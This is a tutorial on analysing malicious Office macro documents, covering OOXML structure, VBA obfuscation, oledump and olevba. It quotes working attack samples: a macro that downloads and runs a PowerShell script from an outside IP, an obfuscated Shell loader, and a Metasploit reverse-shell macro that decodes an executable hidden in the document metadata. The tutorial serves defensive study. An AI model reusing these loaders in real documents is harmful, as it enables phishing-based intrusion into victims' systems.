Analyzing Malware Documents
Embedding code within a file allows certain tasks to be carried out when handling documents, whether to enhance the content or to process data within the document. However, malicious actors have abused this feature for a long time, and little can be done to mitigate this attack vector without removing the functionality from the document.
Microsoft has included the ability to embed Visual Basic for Applications code within Office documents since 1993, with the first version implemented in Excel, allowing users to record actions to automate working with documents.
Visual Basic for Applications, or VBA, is based on Visual Basic 6, Microsoft's event-driven programming language that was discontinued in 2008. However, the language lives on in VBA, where it facilitates automating tasks within Office documents, and also in VBScript.
Office Document Structure
In the early 2000s, Microsoft began moving from a single binary file with a closed standard to an open standard that uses XML files to make up the document. It became the default format in Office 2007.
Officially called Office Open XML and distinguished by an x at the end of the file extension, the file is mainly made up of XML files contained in a zip archive. Any other files that are inserted into the document are also included within the zip archive.
Within the zip archive, some files exist regardless of the type of document; these are the metadata files. Other files depend on the type of document; these are the document files, stored in a directory named after the document type.
The contents of the archive may differ depending on the program that created the file.
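Because the container is an ordinary zip archive, its parts can be listed without opening the file in Office. The following is a minimal Python sketch that groups member names by top-level directory. The function names and the contents of the demo archive are illustrative assumptions, not taken from a real sample.

```python
import io
import zipfile
from collections import defaultdict


def group_parts(archive):
    """Group the member names of a zip-based document by top-level directory."""
    groups = defaultdict(list)
    with zipfile.ZipFile(archive) as zf:
        for name in zf.namelist():
            # Members without a directory component live at the archive root.
            top = name.split("/", 1)[0] if "/" in name else "(root)"
            groups[top].append(name)
    return dict(groups)


def build_demo_archive():
    """Build a tiny in-memory archive that mimics the layout described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in (
            "[Content_Types].xml",
            "_rels/.rels",
            "docProps/core.xml",
            "docProps/app.xml",
            "word/document.xml",
        ):
            zf.writestr(name, "<placeholder/>")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for top, names in group_parts(build_demo_archive()).items():
        print(top, names)
```

Passing a path such as a .docx or .docm file to group_parts instead of the in-memory buffer should work the same way, since zipfile accepts both.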
Metadata Files
Three kinds of files make up this section:
- Content Types: This XML file specifies the file type for each extension of the files included within the archive. The file is named [Content_Types].xml
- Relationships: The files that end in .rels act as a type of index, telling the program where to locate all of the files related to the different parts that make up the document. The file located at _rels/.rels contains the details for the primary files within the document.
- References to Resources: Each component, for example a page within a Word document, has its own _rels/<resource>.xml.rels file that points to other files related to that specific resource, for example an entry for an image file that is shown on one of the pages of the Word document.
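To illustrate how a relationships file works as an index, the sketch below parses one with Python's standard library and lists where each entry points. The sample XML is written by hand for illustration and is an assumption, as is the function name; only the relationships namespace and the Id, Type, and Target attributes come from the package format itself.

```python
import xml.etree.ElementTree as ET

# Namespace used by relationship parts in the package format.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Hypothetical relationships part, written by hand for illustration.
SAMPLE_RELS = """<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
    Target="media/image1.png"/>
</Relationships>"""


def list_relationships(rels_xml):
    """Return (Id, short type, Target) for every Relationship element."""
    root = ET.fromstring(rels_xml)
    rows = []
    for rel in root.iter(REL_NS + "Relationship"):
        # Keep only the last path segment of the type URI for readability.
        short_type = rel.get("Type", "").rsplit("/", 1)[-1]
        rows.append((rel.get("Id"), short_type, rel.get("Target")))
    return rows


if __name__ == "__main__":
    for row in list_relationships(SAMPLE_RELS):
        print(row)
```

During an analysis, unexpected targets in these files (for example, external URLs) may be worth a closer look.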
Document Properties
Located in the directory docProps, this section contains two XML files that hold the properties of the document:
- app.xml: This file contains several file properties that relate to the application, including metrics data and program versions
- core.xml: This file contains document data such as title, author, and timestamps, among other properties. Some properties are user modifiable and others are controlled by the program.
Main Document Contents
The document contents are included in this directory and the directory name depends on the program that creates the file
- word: Word Documents
- ppt: PowerPoint Presentations
- xl: Excel Spreadsheets
The contents of this directory vary between the format types; however, they mainly include styling data and the layout of the document contents.
Macros may also be included within this directory, or they may exist in a separate Macros directory.
Media
This directory includes any media, such as images, that are inserted into the document.
Malware in Macros
Malware is often embedded within Office documents, which use enticing names and messages to get users to open them and ignore any alerts.
Early versions of Office would automatically execute any included macros, which made things easier for malicious actors, as they only needed the victim to open the file. Because of this, Microsoft changed the way macros work: user intervention is now required to start the execution of a macro, and the user is alerted to the risk of running macros in unknown files.
Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents without always considering employee education or signing the documents to avoid alerts. This results in users being trained to ignore the alerts, which makes things easier for malicious actors.
There are multiple ways that macros can be abused to attack the victim's system. In some cases the malware is within the code itself, or the code may carry an encoded binary file that is then decoded, saved to disk, and executed.
Recent cases use the Office document as a first stage, where PowerShell code is leveraged to download a second stage that contains the actual malware. Because of the detection mechanisms in current security tools, malicious actors need to encode payloads and commands with different methods, including simple encoding algorithms such as Base64, reversing strings, or obfuscating the strings within the code.
A simple example for a first stage using macros is shown in How to create Microsoft Office macro malware – phishing attack
Sub Auto_Open()
Dim exec As String
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://192.168.1.104/tar.txt'))"""
Shell (exec)
End Sub
In this example, the attack is simple and not obfuscated: the code downloads a file from a web server and executes it using PowerShell. The downloaded PowerShell script could act as a second stage or even establish a reverse shell; the possibilities are endless.
During an investigation, it is necessary to obtain any additional files that the macro downloads in order to build the complete picture and look for indicators of compromise. These can be used to search for other systems that may have been infected or to establish monitoring rules that look out for new victims.
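As a starting point for collecting indicators of compromise, URLs and IPv4 addresses can be pulled out of the macro source with regular expressions. This is a rough Python sketch; the patterns and the function name are assumptions chosen for illustration, and they will miss indicators that are encoded or built at run time.

```python
import re

# Stop a URL at whitespace, quotes (straight or typographic), brackets, or ")".
URL_RE = re.compile(r"https?://[^\s'\"<>)’”]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(source):
    """Return the unique URLs and IPv4 addresses found in macro source text."""
    urls = sorted(set(URL_RE.findall(source)))
    ips = sorted(
        {
            ip
            for ip in IPV4_RE.findall(source)
            # Discard dotted numbers whose octets cannot be part of an address.
            if all(int(part) <= 255 for part in ip.split("."))
        }
    )
    return {"urls": urls, "ipv4": ips}


if __name__ == "__main__":
    line = (
        'exec = "powershell.exe ""IEX ((new-object net.webclient)'
        ".downloadstring('http://192.168.1.104/tar.txt'))\"\"\""
    )
    print(extract_iocs(line))
```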
Parts of the malware can be placed within the metadata of the document. This serves as an easy hiding spot, and the payload can be quickly changed without having to alter the code.
Entry Point
For macro code, several functions can act as the entry point for execution; the choice depends on the intention or obfuscation method of the malicious actor. It is common for security applications to open email attachments for quick analysis. To avoid the malware being triggered during that analysis, the malicious actor can use a different function that triggers execution at a later point or under certain conditions.
Below is a sample of obfuscated code that serves as the entry point for the malware, where the function DecodeDocument is used
Attribute VB_Name = "NewMacros"
Sub DecodeDocument()
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
'
' DecodeDocument Macro
'
'
Dim d3h5dHh5U3BwaWxX
ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")
d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)
d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)
End Sub
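The property name in the sample above is hidden behind a chain of Chr() calls. A small Python sketch can collapse such chains back into string literals so the code is easier to read. The regular expression and function name are assumptions for illustration, and the sketch only handles literal numeric arguments joined with + or &.

```python
import re

# One or more Chr(<number>) calls joined by + or &.
CHR_CHAIN_RE = re.compile(
    r"\bChr\(\d+\)(?:\s*[+&]\s*Chr\(\d+\))*", re.IGNORECASE
)


def resolve_chr_chains(source):
    """Replace chains of Chr(n) calls with the equivalent VBA string literal."""

    def to_literal(match):
        codes = re.findall(r"\d+", match.group(0))
        text = "".join(chr(int(code)) for code in codes)
        # Double any quotes so the result stays a valid VBA literal.
        return '"' + text.replace('"', '""') + '"'

    return CHR_CHAIN_RE.sub(to_literal, source)


if __name__ == "__main__":
    line = (
        "ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109)"
        " + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))"
    )
    print(resolve_chr_chains(line))
    # prints: ThisDocument.BuiltInDocumentProperties("Comments")
```

The result shows that the macro reads the Comments property of the document, which points the analysis toward the metadata.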
Base64 Decode Function
VBA does not include a function or library that can quickly encode or decode Base64. However, it can be implemented easily with other libraries available to Office, such as MSXML, as shown in the following code
Private Function EncodeBase64(ByRef arrData() As Byte) As String
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
' byte array to base64
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Malicious actors sometimes create their own implementation of certain functionality within the malware. This can be done for various reasons: there may be no simpler way to do it within the language, or the goal may be to obfuscate the code. It is also common for only the decoder to be included in the macro, especially when the macro code doesn't need to encode any data.
Below is an obfuscated Base64 decoder that is found in a sample malware
Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc
CBnhtvROBWJf = 2
VAIXQ = bGVuZ3RoCg(GYDozL)
VdNmpUUu = 8
uOatMJ = 16 * 4
For cWBqjCKwBl = 1 To VAIXQ Step 4
Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR
zIlis = 3
EgnwkcNgcIgofn = 0
For OaRRODd = 0 To 3
WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)
If WuFeJHdca = "=" Then
zIlis = zIlis - 1
MmrJRSmq = 0
Else
MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
End If
EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
Next
EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn
dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))
vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
Next
QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function
The function accepts two parameters:
- GYDozL = Base64 encoded string
- xbZuLutP = Base64 alphabet, the 64-character lookup string
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
There are also variables that are used as decoys, meaning that their values are never used after being assigned. The same can be done with functions: multiple functions can be created but never called, or functions can be called while their output is never used.
Encoding is not used with security in mind. It is used to make commands harder to detect, to handle character set conversion, or to avoid parts of the code being lost when data is transferred over the Internet.
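To decode data outside of Office, the obfuscated Base64 decoder shown earlier can be ported to Python. The sketch below follows the same steps (look up each character in the alphabet, pack four 6-bit values into three bytes, drop one byte per padding character) with readable names. The names are assumptions, and the length and unknown-character checks are additions of this sketch that the obfuscated sample does not perform.

```python
STANDARD_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789+/"
)


def decode_base64(encoded, alphabet=STANDARD_ALPHABET):
    """Decode Base64 text using a caller-supplied 64-character alphabet."""
    if len(encoded) % 4 != 0:
        raise ValueError("input length must be a multiple of 4")
    out = bytearray()
    for start in range(0, len(encoded), 4):
        group = 0
        data_bytes = 3
        for ch in encoded[start:start + 4]:
            if ch == "=":
                # Each padding character means one byte less in this group.
                data_bytes -= 1
                value = 0
            else:
                # str.index raises ValueError for characters not in the alphabet.
                value = alphabet.index(ch)
            group = 64 * group + value
        # Four 6-bit values form 24 bits, which is three bytes.
        out += group.to_bytes(3, "big")[:data_bytes]
    return bytes(out)


if __name__ == "__main__":
    print(decode_base64("aGVsbG8="))  # prints: b'hello'
```

Keeping the alphabet as a parameter mirrors the sample, so the same function should also work if a document supplies a non-standard alphabet.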
For this next sample code, the byte value of each character is shifted down by 4, similar to a Caesar cipher such as ROT13, and then the whole string is reversed.
Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
Dim b As String, i As Long, a() As Byte, sh
a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
For i = 0 To UBound(a)
a(i) = a(i) - 4
Next i
b = StrReverse(StrConv(a, vbUnicode))
aWhzZ2lI = b
End Function
There is only one input parameter, which is the string that is encoded.
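The same transformation can be reproduced in Python to recover the strings without running the macro. This is a sketch under two assumptions: the text is treated as Latin-1 bytes (VBA uses the system code page), and the subtraction wraps around instead of raising an error as VBA would for byte values below 4. The function name is also hypothetical.

```python
def shift_and_reverse(encoded, shift=4):
    """Subtract `shift` from every byte, then reverse the resulting string."""
    shifted = bytes((b - shift) % 256 for b in encoded.encode("latin-1"))
    return shifted.decode("latin-1")[::-1]


if __name__ == "__main__":
    # String passed to aWhzZ2lI in the entry point sample shown earlier.
    obfuscated = (
        r"3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE"
    )
    print(shift_and_reverse(obfuscated))
    # prints: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
```

Applied to the string from the entry point, the result is the standard Base64 alphabet, which is then passed to the Base64 decoder as its second parameter.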
One way to analyze a function is to look at the parameters it is called with and the output it returns. It is still important to look for any calls that may execute commands outside of the code or the Office document.
Renaming Functions
Given that VBA cannot alias or rename built-in functions the way languages such as JavaScript allow, a workaround is to create a function that simply returns the value that the other function returns.
In this example, to obfuscate the function Len, a function is created with a random string of characters.
Function bGVuZ3RoCg(c3RyaW5nCg)
bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function
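Wrappers like this can be spotted automatically so that their random names can be mapped back to the function they forward to. The Python sketch below uses a regular expression that only recognizes the simplest case: a one-parameter function whose single statement returns another function called with that same parameter. The pattern and function name are assumptions for illustration.

```python
import re

# Function <name>(<arg>) / <name> = <target>(<arg>) / End Function
WRAPPER_RE = re.compile(
    r"Function\s+(\w+)\s*\((\w+)\)\s*\n"
    r"\s*\1\s*=\s*(\w+)\(\2\)\s*\n"
    r"\s*End Function",
    re.IGNORECASE,
)


def find_wrappers(source):
    """Map each one-line wrapper function name to the function it forwards to."""
    return {m.group(1): m.group(3) for m in WRAPPER_RE.finditer(source)}


if __name__ == "__main__":
    macro = (
        "Function bGVuZ3RoCg(c3RyaW5nCg)\n"
        "bGVuZ3RoCg = Len(c3RyaW5nCg)\n"
        "End Function\n"
    )
    print(find_wrappers(macro))  # prints: {'bGVuZ3RoCg': 'Len'}
```

The resulting mapping can then be used to search and replace the wrapper names throughout the extracted source.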
Document Analysis
This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m, though this can be changed.
The first step is to check the contents of the archive; the 7-Zip utility can be used for this task
❯ 7z l Doc5.docm
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)
Listing archive: Doc5.docm
--
Path = Doc5.docm
Type = zip
Physical Size = 26568
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
1980-01-01 00:00:00 ..... 1585 413 [Content_Types].xml
1980-01-01 00:00:00 ..... 590 239 _rels/.rels
1980-01-01 00:00:00 ..... 4526 1557 word/document.xml
1980-01-01 00:00:00 ..... 1081 301 word/_rels/document.xml.rels
1980-01-01 00:00:00 ..... 27648 10834 word/vbaProject.bin
1980-01-01 00:00:00 ..... 8393 1746 word/theme/theme1.xml
1980-01-01 00:00:00 ..... 277 191 word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 ..... 2474 609 word/vbaData.xml
1980-01-01 00:00:00 ..... 3194 1105 word/settings.xml
1980-01-01 00:00:00 ..... 241 155 customXml/item1.xml
1980-01-01 00:00:00 ..... 341 225 customXml/itemProps1.xml
1980-01-01 00:00:00 ..... 29364 2924 word/styles.xml
1980-01-01 00:00:00 ..... 803 313 word/webSettings.xml
1980-01-01 00:00:00 ..... 1567 502 word/fontTable.xml
1980-01-01 00:00:00 ..... 991 572 docProps/core.xml
1980-01-01 00:00:00 ..... 1041 524 docProps/app.xml
1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------ ------------------------
1980-01-01 00:00:00 84412 22404 17 files
The presence of word/vbaProject.bin and its vbaProject.bin.rels file confirms that a macro is present within the document. This could be a red flag if no macro is expected to be embedded in the document. Further analysis should be carried out to determine whether the code is malicious.
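Since the file extension can be changed, it can be more reliable to check the archive contents than the name. The following Python sketch looks for a vbaProject.bin member in any zip-based document; the function names and the demo archive are assumptions for illustration.

```python
import io
import zipfile


def find_vba_parts(archive):
    """Return archive members that look like an embedded VBA project."""
    with zipfile.ZipFile(archive) as zf:
        return [
            name
            for name in zf.namelist()
            if name.lower().endswith("vbaproject.bin")
        ]


def build_demo(names):
    """Create an in-memory archive with placeholder members for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in names:
            zf.writestr(name, b"placeholder")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    demo = build_demo(["word/document.xml", "word/vbaProject.bin"])
    print(find_vba_parts(demo))  # prints: ['word/vbaProject.bin']
```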
Extracting Macro Source Code
There are tools that can extract source code from the document, such as oledump. This tool can be used to analyze the document.
❯ oledump Doc5.docm
A: word/vbaProject.bin
A1: 412 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 7836 'VBA/NewMacros'
A4: m 1135 'VBA/ThisDocument'
A5: 5028 'VBA/_VBA_PROJECT'
A6: 3195 'VBA/__SRP_0'
A7: 340 'VBA/__SRP_1'
A8: 3399 'VBA/__SRP_2'
A9: 366 'VBA/__SRP_3'
A10: 348 'VBA/__SRP_4'
A11: 106 'VBA/__SRP_5'
A12: 571 'VBA/dir'
The output above shows multiple objects that are identified by the A code at the start of the line and can be easily extracted with the following command
oledump Doc5.docm -v -s A3
This outputs the object A3, which is the source code of the macro contained within the document; it is identified by the capital M in the first output.
Not all macros execute upon loading the document in an Office program; this can be done to avoid automatic analysis with sandbox tools. The function autoopen is used for documents that do execute code upon opening. The following code is an example of this case
Sub autoopen()
MsgBox ("hello world")
End Sub
After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for places where the code carries out potentially dangerous commands and check whether they can be safely replaced with output to a message box or terminal instead of executing other commands.
Tool olevba
Another tool to extract the source code is olevba. Below is the sample document being analyzed with this tool
❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[..SOURCE CODE..]
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbHide |May run an executable file or a system |
| | |command |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|StrReverse |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
+----------+--------------------+---------------------------------------------+
An advantage of this tool is that it highlights parts of the code that are often used in malicious macros, which can be an initial step in determining whether the macro might be malicious and a starting point for what to check.
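The idea behind the keyword table can be approximated with a few lines of Python when the tool is not at hand. This sketch is not how olevba is implemented; it only searches extracted source for the four keywords from the table above, with descriptions copied from that output. The dictionary and function names are assumptions.

```python
import re

# Keywords and descriptions taken from the table in the output above.
SUSPICIOUS = {
    "Shell": "May run an executable file or a system command",
    "vbHide": "May run an executable file or a system command",
    "Chr": "May attempt to obfuscate specific strings",
    "StrReverse": "May attempt to obfuscate specific strings",
}


def scan_keywords(source):
    """Return (keyword, description) pairs for keywords present in the source."""
    hits = []
    for keyword, description in SUSPICIOUS.items():
        # Whole-word, case-insensitive match, since VBA ignores case.
        pattern = r"\b" + re.escape(keyword) + r"\b"
        if re.search(pattern, source, re.IGNORECASE):
            hits.append((keyword, description))
    return hits


if __name__ == "__main__":
    for keyword, description in scan_keywords("x = Shell(cmd, vbHide)"):
        print(keyword, "-", description)
```

A hit is only a hint: legitimate macros also use these functions, so the surrounding code still needs to be read.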
Extracting Metadata
In newer Office documents, the metadata is stored in a file called core.xml and can be viewed with the command xmllint
xmllint --format core.xml
The output is formatted and can be easily read
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title>JXZzaiRrc[..SNIP..]SR3bWxY</dc:title>
<dc:subject/>
<dc:creator>Document Author</dc:creator>
<cp:keywords>WW91J3JlIGluIHR[..SNIP..]XJkZXIh</cp:keywords>
<dc:description>gWpoNDZoPTZqNzlpPTE5O2l[..SNIP..]HBpbHd2aXtzdA</dc:description>
<cp:lastModifiedBy>Document Author</cp:lastModifiedBy>
<cp:revision>7</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2020-07-16T00:41:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T00:55:00Z</dcterms:modified>
</cp:coreProperties>
There are a couple of encoded strings visible, and the macro makes reference to the metadata. Encoded strings in the metadata can also be a red flag, as they often contain other data that the macro needs, such as URLs or IP addresses from which to download another stage. Decoding them can provide more details, though multiple encodings may be used.
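Flagging such properties can be automated. The Python sketch below parses a core.xml string and reports the properties whose values consist only of Base64 characters. The sample XML and its encoded value are hypothetical (the values in the output above are truncated, so they are not reused), and the minimum length of 16 characters is an arbitrary assumption to reduce false positives.

```python
import base64
import re
import xml.etree.ElementTree as ET

# At least 16 Base64 characters, optionally followed by padding.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# Hypothetical encoded value and document properties, for illustration only.
ENCODED = base64.b64encode(b"hypothetical second-stage address").decode("ascii")
SAMPLE_CORE = (
    '<cp:coreProperties'
    ' xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"'
    ' xmlns:dc="http://purl.org/dc/elements/1.1/">'
    "<dc:title>{0}</dc:title>"
    "<dc:creator>Document Author</dc:creator>"
    "<cp:revision>7</cp:revision>"
    "</cp:coreProperties>"
).format(ENCODED)


def base64_like_properties(core_xml):
    """Return {property name: value} for values that look like Base64."""
    root = ET.fromstring(core_xml)
    flagged = {}
    for element in root:
        tag = element.tag.rsplit("}", 1)[-1]  # drop the namespace prefix
        value = (element.text or "").strip()
        if BASE64_RE.match(value):
            flagged[tag] = value
    return flagged


if __name__ == "__main__":
    for name, value in base64_like_properties(SAMPLE_CORE).items():
        print(name, "->", base64.b64decode(value))
```

If a decoded value still looks scrambled, it may have gone through a further encoding step before being stored.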
Metasploit Reverse Shell
This is a reverse shell macro that was created using Metasploit. It is a good beginner sample for practicing the analysis of malware documents, and this section walks through how to check the document.
First, checking the file using oledump shows the following output
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
The object to extract is A3, as it is marked with the letter M, which the oledump tool uses to denote macro code. Its content is shown below.
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
The source code in this instance is not obfuscated, which makes it easier to analyze, and there is a check for the running OS so that different commands are used. The macro reads the Comments property, which is found in the metadata.
Checking the core.xml file shows a big block of data in the description field, which is where the Comments property is stored
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>TVqQAAMAAA[...]GFiLnBkYgA=</dc:description>
<cp:lastModifiedBy>Wei Chen</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
<cp:category/>
</cp:coreProperties>
The long string is encoded using Base64; decoding the data results in a binary file.
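The decoding step can be done with Python's standard library. The leading characters TVqQ are the Base64 form of the bytes 4D 5A 90, which start with the MZ signature of a Windows executable, so a quick header check is included. This is a sketch: the function names are assumptions, and so is the skip parameter. The macro reads the property with Mid(prop.Value, 56), meaning from character 56 onward, but the value shown above is truncated, so whether a prefix has to be skipped for a given file is left to the analyst.

```python
import base64


def decode_payload(property_value, skip=0):
    """Base64-decode a property value, optionally skipping leading characters."""
    return base64.b64decode(property_value[skip:])


def looks_like_pe(data):
    """Check for the two-byte MZ signature that starts Windows executables."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    # Hypothetical stand-in for the truncated dc:description value.
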